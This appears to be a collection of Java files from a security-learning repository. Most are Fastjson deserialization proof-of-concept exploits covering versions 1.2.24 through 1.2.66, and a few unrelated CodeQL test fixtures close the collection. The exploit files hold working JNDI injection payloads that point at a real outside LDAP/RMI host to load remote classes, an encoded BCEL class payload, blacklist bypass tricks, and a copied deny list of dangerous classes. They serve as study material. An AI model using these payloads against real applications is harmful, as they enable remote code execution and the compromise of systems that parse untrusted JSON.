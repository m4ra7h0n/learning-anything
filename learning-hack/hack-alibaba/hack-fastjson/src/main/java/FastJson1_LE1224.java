import com.alibaba.fastjson.JSON;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.codec.binary.Base64;

import static templatesimpl.TemplatesImplPoc.templatesImpl;


public class FastJson1_LE1224 {
    /**
     * JSON.parseObject(poc2);
     *  JSON.parse(String text)
     *   JSON.parse(String text, int features)
     *    DefaultJSONParser.parse()
     *     DefaultJSONParser.parse(Object fieldName)
     *      case LBRACE
     *      DefaultJSONParser.parseObject(final Map object, Object fieldName)
     *       JavaBeanDeserializar.deserialze(DefaultJSONParser parser, Type type, Object fieldName)
     *        JavaBeanDeserializer.parseRest(DefaultJSONParser parser, Type type, Object fieldName, Object instance, int features)
     *         JavaBeanDeserializer.deserialze(DefaultJSONParser parser, Type type, Object fieldName, Object object, int features)
     *          JavaBeanDeserializer.parseField(DefaultJSONParser parser, String key, Object object, Type objectType, Map<String, Object> fieldValues)
     *          FieldDeserializer.parseField(DefaultJSONParser parser, Object object, Type objectType, Map<String, Object> fieldValues)
     *           FieldDeserializer.setValue(Object object, Object value)
     *            method.invoke(object, value)
     */
    public static String jdbcRowSetImpl() {
        /**
         * com.sun.rowset.JdbcRowSetImpl.setAutoCommit()
         *  com.sun.rowset.JdbcRowSetImpl.connect()
         *   var1.lookup(this.getDataSourceName());
         */
        // 这里之所以是dataSourceName而不是dataSource 是因为 fastjson会调用setter, 进而调用setDataSourceName 来设置dataSource
        // 而且dataSourceName和autoCommit的顺序不能变, 这是因为setter调用顺序原因

        // 如下poc需要本地启用RMIServer
        // String poc = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\", \"dataSourceName\":\"rmi://127.0.0.1:1099/refObj\", \"autoCommit\":true}";

//         下面两个poc分别在远端开启rmi和ldap服务即可使用
//         String poc = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\", \"dataSourceName\":\"rmi://47.95.7.37:1099/Calc\", \"autoCommit\":true}";
        String poc = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\", \"dataSourceName\":\"ldap://47.95.7.37:1389/Calc\", \"autoCommit\":true}";

        /**
         * 下面三种任选一种
         * JSON.parse(PoC);
         * JSON.parseObject(PoC);
         * JSONObject.parse(PoC);
         */
        return poc;
    }


    public static void main(String[] args) throws Exception {
        String poc = templatesImpl();
//        JSON.parseObject(poc, Feature.SupportNonPublicField);
//        JSON.parse(poc, Feature.SupportNonPublicField);
//        JSON.parseObject(poc, Object.class, Feature.SupportNonPublicField);

        String poc2 = jdbcRowSetImpl();
        JSON.parse(poc2);
//        JSON.parseObject(poc2);
//        JSONObject.parse(poc2);
    }
}
