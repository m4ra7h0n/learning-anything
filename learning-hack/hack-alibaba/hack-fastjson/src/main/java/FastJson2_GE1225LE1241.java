import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;
import com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer;

/**
 * Created by xjj on 2023/3/7.
 */
public class FastJson2_GE1225LE1241 {
    // 1.autoTypeSupport修改为默认false
    // 2.DefaultJSONParser.parseObject()
    //    config.checkAutoType(typeName, null);
    //     内部增加denyList如下

    // bsh
    // com.mchange
    // com.sun.
    // java.lang.Thread
    // java.net.Socket
    // java.rmi
    // javax.xml
    // org.apache.bcel
    // org.apache.commons.beanutils
    // org.apache.commons.collections.Transformer
    // org.apache.commons.collections.functors
    // org.apache.commons.collections4.comparators
    // org.apache.commons.fileupload
    // org.apache.myfaces.context.servlet
    // org.apache.tomcat
    // org.apache.wicket.util
    // org.codehaus.groovy.runtime
    // org.hibernate
    // org.jboss
    // org.mozilla.javascript
    // org.python.core
    // org.springframework

    static {
        System.setProperty("com.alibaba.fastjson.parser.ParserConfig.autoTypeSupport", "true");
    }
    public static String jdbcRowSetImpl() {
        /**
         * 如果autoTypeSupport为 true, 只要类不在denyList则正常加载
         * 如果autoTypeSupport为 false(默认), 要求类不能出现在denyList, 且要在acceptList中
         */
        // poc 这块首尾加了L和;
        String poc = "{\"@type\":\"Lcom.sun.rowset.JdbcRowSetImpl;\", \"dataSourceName\":\"ldap://47.95.7.37:1389/Calc\", \"autoCommit\":true}";

        /**
         * 下面三种任选一种
         * JSON.parse(PoC);
         * JSON.parseObject(PoC);
         * JSONObject.parse(PoC);
         */
        return poc;
    }


    public static void main(String[] args) {
        String poc = jdbcRowSetImpl();
        JSON.parseObject(poc);
    }
}
