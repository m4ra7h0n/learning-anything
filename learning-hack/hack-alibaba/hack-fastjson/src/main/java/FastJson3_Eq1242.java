import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;
import com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer;

/**
 * Created by xjj on 2023/3/8.
 */
public class FastJson3_Eq1242 {
    static {
        System.setProperty("com.alibaba.fastjson.parser.ParserConfig.autoTypeSupport", "true");
    }
    public static String jdbcRowSetImpl() {
        /**
         * 和上一个逻辑一样
         * 只不过多了一层过滤判断首尾字符串, 并截掉
         * 只需要双写即可
         * checkAutoType() 的时候递归首尾去掉加载恶意代码
         */
        // poc 这块首尾加了L和;
//        String poc = "{\"@type\":\"LLcom.sun.rowset.JdbcRowSetImpl;;\", \"dataSourceName\":\"ldap://47.95.7.37:1389/Calc\", \"autoCommit\":true}";

        // 高版本测试
//        String poc = "{\"@type\":\"LLcom.sun.rowset.JdbcRowSetImpl;;\", \"dataSourceName\":\"rmi://127.0.0.1:1099/Calc\", \"autoCommit\":true}";

        // bcel + tomcat-dbcp
        String bcel = "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5RMo$d3$40$Q$7d$9b8$b1cl$d2$a6$q$7cC$a0$F$d2J$d4$Xn$ad$wDU$q$84$a1$88T$e5$bc$de$ae$da$N$h$afeo$aa$f0$8b8$f7R$Q$H$7e$A$3f$K1$5e$daR$Jnx$e5$Z$cf$9byofG$fe$f1$f3$dbw$A$cf$f08D$80$eb$nn$e0f$80$5b$b5$bf$ed$e3N$88$W$ee$fa$b8$e7$e3$3eC$7bS$e5$can14G$ab$fb$M$de$b69$90$M$ddT$e5$f2$edl$9a$c9r$8fg$9a$90$5ej$E$d7$fb$bcTu$7c$Gz$f6HU$M$cfSa$a6$c9$7c2$d1$92$97$b9$ca$P$93$p$$$3e$s$T$7e$cc$93$8cWJ$qB$f3$aa$d2$86$l$c82$c9$3eY$v$a8K$95$ec$i$x$fdBH$bd$c1$Ql$K$7d6$I$p$e1$7e$ea$c8$ca$q$afvw$e6B$WV$99$9c$ca$e2$b1$r$e57$bcp$D$d0$5d$Y$c2$b1$99$95B$beT$f5$40$f1$b9$e4z$cd$8f$d0A$e8c$Y$e1$B$k2$ML$n$f3$e1S$3e$dc$e6Z$cc4$b7$a6$5c$e7E$Ra$Z$x$MK$ff$e8$Y$e1$RB$86$ad$ff$bb$k$c3$82$ab$d5$9c$a8$bb$d9D$K$cb$b0$f8$Hz$3f$cb$ad$9a$d2$f4$e1$a1$b4$XA$7f$b4$9a$feUC$x$f0$e4$5c$K$86$t$a3K$d9$b1$zi$ac$8d$cb$84w$a5$R$b2$aa$88$d0$z$ui$dd$e2$f6J$$$q$z$c3$a7$df$a2$7e$g$60$f5$8a$c8$5e$a1$u$n$cf$c8$b7$d6$be$80$9d$b8tD$b6$ed$c0$A1$d9$e8w$B$ae$a2$eb$b0$85$L2wb$40$ef$x$g$bd$e6$v$bc$P$9f$R$bc$5e$3bE$fb$c4$e1$j$e2$b6$d0t$8a$D$fa$C$b1$3a$a4$T$d1$89$e9$y$92$e2y$87$Y$k$c5$3d$8a$96$e8$f5$d1H$7d$5c$f3$u$d1wC$N$7e$B$b8$b1$V$bc$e0$C$A$A";
        String poc = "{\n" +
                "    {\n" +
                "        \"aaa\": {\n" +
                "                \"@type\": \"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\",\n" +
                "                \"driverClassLoader\": {\n" +
                "                    \"@type\": \"com.sun.org.apache.bcel.internal.util.ClassLoader\"\n" +
                "                },\n" +
                "                \"driverClassName\": \"" + bcel + "\"\n" +
                "        }\n" +
                "    }: \"bbb\"\n" +
                "}";

        /**
         * 下面三种任选一种
         * JSON.parse(PoC);
         * JSON.parseObject(PoC);
         * JSONObject.parse(PoC);
         */
        return poc;
    }

    public static void main(String[] args) {
        System.out.println(JSON.VERSION);

        String poc = jdbcRowSetImpl();
        JSON.parseObject(poc);
    }
}
