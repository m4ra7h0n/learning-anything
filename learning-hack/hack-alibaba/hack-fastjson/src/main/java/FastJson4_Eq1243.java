import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;

/**
 * Created by xjj on 2023/3/8.
 */
public class FastJson4_Eq1243 {
    static {
        System.setProperty("com.alibaba.fastjson.parser.ParserConfig.autoTypeSupport", "true");
    }
    public static String jdbcRowSetImpl() {
        /**
         * 这个逻辑欺骗了parser, 目的是绕过解析器, 具体怎么找的就是硬整, 一遍遍调试尝试
         */
        String poc = "{\"@type\":\"[com.sun.rowset.JdbcRowSetImpl\"[{, \"dataSourceName\":\"ldap://47.95.7.37:1389/Calc\", \"autoCommit\":true}";

        /**
         * 下面三种任选一种
         * JSON.parse(PoC);
         * JSON.parseObject(PoC);
         * JSONObject.parse(PoC);
         */
        return poc;
    }

    public static void main(String[] args) {
        System.out.println(JSON.VERSION);

        String poc = jdbcRowSetImpl();
        JSON.parseObject(poc);
    }
}
