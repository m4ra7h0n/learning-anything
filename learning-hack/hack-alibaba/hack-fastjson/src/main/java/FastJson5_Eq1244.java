import com.alibaba.fastjson.JSON;

/**
 * Created by xjj on 2023/3/8.
 */

/**
 * org.apache.ibatis.datasource.jndi.JndiDataSourceFactory#setProperties(java.util.Properties)
 *  javax.naming.InitialContext#lookup(java.lang.String)
 */
public class FastJson5_Eq1244 {
    // mybatis -> 3.x.x 系列<3.5.0 的版本
    public static void main(String[] args) {
        // org.apache.ibatis.datasource.jndi.JndiDataSourceFactory

        // setProperties()
        //  lookup( properties.getProperty(DATA_SOURCE) )

        // 1.先解析类和字段, 解析类, 分装好java.util.Properties
        // properties处 生成JndiDataSourceFactory的asm后走MapDeserializer -> 可以细看看里面很多key-value结构的数据都走这条
        // 2.调用properties的setter方法

//        org.apache.ibatis.datasource.jndi.JndiDataSourceFactory

        String ldap = "ldap://47.95.7.37:1389/Calc";
        String poc = String.format("{\"@type\":\"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory\",\"properties\":{\"data_source\":\"%s\"}}", ldap);
        JSON.parseObject(poc);
    }
}
