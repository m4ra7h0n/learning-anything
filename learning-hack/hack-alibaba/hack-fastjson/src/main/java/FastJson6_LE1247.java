import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;
import com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer;
import com.alibaba.fastjson.serializer.MiscCodec;

/**
 * Created by xjj on 2023/3/8.
 */
public class FastJson6_LE1247 {
    // 通杀前面的版本
    // 问题出在checkAutoType处, 有缓存过类则不会抛出异常

    // 1.如何缓存?
    // TypeUtils.loadClass() 的时候, 执行下面的代码
    // if (cache) {
    //  mappings.put(className, clazz);
    //}

    // 2.缓存绕过哪里的限制?
    // checkAutoType 处没有被检测出, 没有抛出异常(在黑名单里)
    // 因为我们没有打开autoTypeSupport, 所以黑名单也没检测出来, 即使黑名单检测出来了, 后面有一个判断是否存在缓存, 也能绕过Exception
    // 同时checkAutoType 成功的拿到了我们的 JdbcRowSetImpl类

    // 3.为什么一定要加val作为key?
    // MiscCodec:227有对val的限制
    // JSONToken.LITERAL_STRING 的时候就会判断是否是val

    // 4.为什么是MiscCodec?
    // ParserConfig初始化的时候默认java.lang.Class的deserializer就是MiscCodec
    // deserializers.put(Class.class, MiscCodec.instance);

    // 5.为什么使用java.lang.Class?

    // 6.修复1.2.48
    // 黑名单多了两条，MiscCodec中将默认传入的cache变为false，checkAutoType()调整了逻辑
    //        if (clazz == Class.class) {
    //            return (T) TypeUtils.loadClass(strVal, parser.getConfig().getDefaultClassLoader(), false);
    //        }

    public static void main(String[] args) {
//        ParserConfig
//        MiscCodec
        String jsonStr =
                "{" +
                        "\"a\":{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"}," +
                        "\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://47.95.7.37:1389/Calc\",\"autoCommit\":true}" +
                "}";
        JSON.parseObject(jsonStr);
    }
}
