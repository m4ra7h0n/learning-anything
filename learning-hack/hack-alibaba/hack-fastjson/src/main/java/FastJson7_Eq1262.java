import com.alibaba.fastjson.JSON;

/**
 * Created by xjj on 2023/3/9.
 */
public class FastJson7_Eq1262 {
    static {
        System.setProperty("fastjson.parser.autoTypeSupport", "true");
    }
    // 黑名单不全
    // org.apache.xbean.propertyeditor.AbstractConverter.setAsText(String text)
    //  org.apache.xbean.propertyeditor.AbstractConverter.toObject(String text)
    //   org.apache.xbean.propertyeditor.JndiConverter.toObjectImpl(String text)
    //    context.lookup(text);
    public static void main(String[] args) {
        String poc = "{\"@type\":\"org.apache.xbean.propertyeditor.JndiConverter\",\"asText\":\"ldap://47.95.7.37:1389/Calc\"}\"";
        JSON.parseObject(poc);
    }
}
