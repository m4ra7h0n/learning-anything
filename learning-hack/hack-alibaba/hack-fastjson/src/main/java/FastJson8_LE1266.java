import com.alibaba.fastjson.JSON;

/**
 * Created by xjj on 2023/3/9.
 */
public class FastJson8_LE1266 {
    // 黑名单不全
    public static void main(String[] args) {
        String ldap = "ldap://47.95.7.37:1389/Calc";
        String poc1 = String.format("{\"@type\":\"org.apache.shiro.jndi.JndiObjectFactory\",\"resourceName\":\"%s\"}", ldap);
        String poc2 = String.format("{\"@type\":\"br.com.anteros.dbcp.AnterosDBCPConfig\",\"metricRegistry\":\"%s\"}", ldap);
        String poc3 = String.format("{\"@type\":\"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup\",\"jndiNames\":\"%s\"}", ldap);
        String poc4 = String.format("{\"@type\":\"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig\",\"properties\": {\"@type\":\"java.util.Properties\",\"UserTransaction\":\"%s\"}}", ldap);

        JSON.parseObject(poc1);
    }
}
