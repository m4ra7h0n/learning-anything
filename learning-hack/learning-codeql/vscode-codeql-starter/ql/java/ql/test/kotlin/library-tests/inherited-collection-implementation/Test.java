import java.util.*;

public class Test {

  public boolean contains(Object o) { return false; }

}

class SetImpl<T> extends Test implements Set<T> {

    public int size() {
        return 0;
    }

    public boolean isEmpty() {
        return false;
    }

    public Iterator<T> iterator() {
        return null;
    }

    public Object[] toArray() {
        return new Object[0];
    }

    public <T1> T1[] toArray(T1[] a) {
        return null;
    }

    public boolean add(T t) {
        return false;
    }

    public boolean remove(Object o) {
        return false;
    }

    public boolean containsAll(Collection<?> c) {
        return false;
    }

    public boolean addAll(Collection<? extends T> c) {
        return false;
    }

    public boolean retainAll(Collection<?> c) {
        return false;
    }

    public boolean removeAll(Collection<?> c) {
        return false;
    }

    public void clear() {

    }

}
