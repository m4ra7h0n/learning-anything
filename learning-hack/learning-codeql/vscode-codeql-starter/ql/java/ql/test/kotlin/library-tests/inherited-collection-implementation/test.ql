import java

from MethodAccess ma
where ma.getEnclosingCallable().fromSource()
select ma
