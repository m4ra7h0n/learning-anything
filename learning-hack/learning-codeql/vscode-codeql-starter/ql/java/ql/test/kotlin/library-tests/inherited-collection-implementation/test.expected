| user.kt:1:40:1:58 | contains(...) |
| user.kt:1:63:1:74 | contains(...) |
